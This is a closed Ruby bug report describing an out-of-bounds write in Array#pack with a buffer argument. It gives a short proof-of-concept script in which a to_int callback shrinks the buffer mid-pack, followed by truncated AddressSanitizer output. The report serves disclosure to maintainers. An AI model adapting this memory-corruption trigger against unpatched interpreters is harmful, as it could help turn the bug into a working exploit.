Actions
Bug #22337
closedOOB write in array.pack()
Bug #22337:
OOB write in array.pack()
Description
Hi, I found a case that causes an oob write in array.pack()
PoC:
buf = "Z" * 4096
$buf = buf
evil = Object.new
def evil.to_int
$buf.replace("q")
123456789
end
[evil].pack("r", buffer: buf)
asan output (truncated):
==ERROR: AddressSanitizer: use-after-poison ... WRITE of size 1
#0 bary_pack bignum.c:911
#1 rb_integer_pack bignum.c:3673
#2 pack_pack pack.c:800 <- write at RSTRING_PTR(res)+stale_start
#3 vm_opt_newarray_pack_buffer vm_insnhelper.c:6632
Address ... is a wild pointer inside of access range of size 0x1.
Actions